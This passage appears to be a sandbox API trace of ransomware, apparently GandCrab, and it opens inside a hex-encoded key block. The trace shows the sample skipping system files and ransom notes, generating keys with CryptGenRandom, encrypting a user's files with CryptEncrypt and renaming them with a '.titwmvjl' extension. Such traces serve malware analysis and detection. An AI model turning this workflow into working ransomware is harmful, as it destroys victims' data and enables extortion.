x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0090.621] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0090.622] CloseHandle (hObject=0x2d4) returned 1 [0090.622] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.622] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.622] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x23, wMilliseconds=0x3af)) [0090.623] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.623] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.623] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.623] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock") returned 135 [0090.623] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0090.624] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.625] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.625] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\") returned 111 [0090.625] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\*" [0090.625] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5037f8 [0090.625] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.625] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.625] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.626] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.626] lstrcmpW (lpString1="-BS4mF.xls", lpString2=".") returned 1 [0090.626] lstrcmpW (lpString1="-BS4mF.xls", lpString2="..") returned 1 [0090.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\", lpString2="-BS4mF.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls" [0090.626] lstrlenW (lpString=".titwmvjl") returned 9 [0090.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned 121 [0090.626] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.626] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls.titwmvjl") returned 130 [0090.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned 121 [0090.626] lstrlenW (lpString=".xls") returned 4 [0090.626] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.626] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xls ") returned 5 [0090.626] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0090.626] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned 121 [0090.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned 121 [0090.626] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="desktop.ini") returned -1 [0090.626] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="autorun.inf") returned 1 [0090.626] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="ntuser.dat") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="iconcache.db") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="bootsect.bak") returned 1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="boot.ini") returned 1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="ntuser.dat.log") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="thumbs.db") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="CRAB-DECRYPT.html") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="ntldr") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="NTDETECT.COM") returned -1 [0090.627] lstrcmpiW (lpString1="-BS4mF.xls", lpString2="Bootfont.bin") returned 1 [0090.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls") returned 121 [0090.627] lstrlenW (lpString=".xls") returned 4 [0090.627] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.627] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.627] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.627] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.627] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\-bs4mf.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.628] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.628] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.629] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.629] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.629] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.629] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.629] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.629] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.630] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.630] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.630] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.630] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.630] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.630] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.631] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.631] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.631] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.631] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.631] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.631] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.632] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503478) returned 1 [0090.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.632] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.632] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.632] GetLastError () returned 0x0 [0090.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.632] CryptDestroyKey (hKey=0x503478) returned 1 [0090.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.633] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.633] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.633] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.634] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503738) returned 1 [0090.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.634] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.634] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.634] GetLastError () returned 0x0 [0090.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.635] CryptDestroyKey (hKey=0x503738) returned 1 [0090.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.635] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.635] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.635] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.635] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x13c66, lpOverlapped=0x0) returned 1 [0090.644] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffec39a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.644] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13c66, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x13c66, lpOverlapped=0x0) returned 1 [0090.649] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.650] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.655] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.656] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.656] CloseHandle (hObject=0x248) returned 1 [0090.657] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\-bs4mf.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\-BS4mF.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\-bs4mf.xls.titwmvjl"), dwFlags=0x1) returned 1 [0090.658] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.658] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.658] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.658] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.658] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock" [0090.658] lstrlenW (lpString=".titwmvjl") returned 9 [0090.658] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock") returned 135 [0090.658] VirtualAlloc (lpAddress=0x0, dwSize=0x14e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.658] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 144 [0090.658] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\d2ca4a09d2ca4deb61a.lock") returned 135 [0090.658] lstrlenW (lpString=".lock") returned 5 [0090.658] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.659] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.659] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.659] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.659] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.659] lstrcmpW (lpString1="iRG4QnoO.ppt", lpString2=".") returned 1 [0090.659] lstrcmpW (lpString1="iRG4QnoO.ppt", lpString2="..") returned 1 [0090.659] lstrcatW (in: 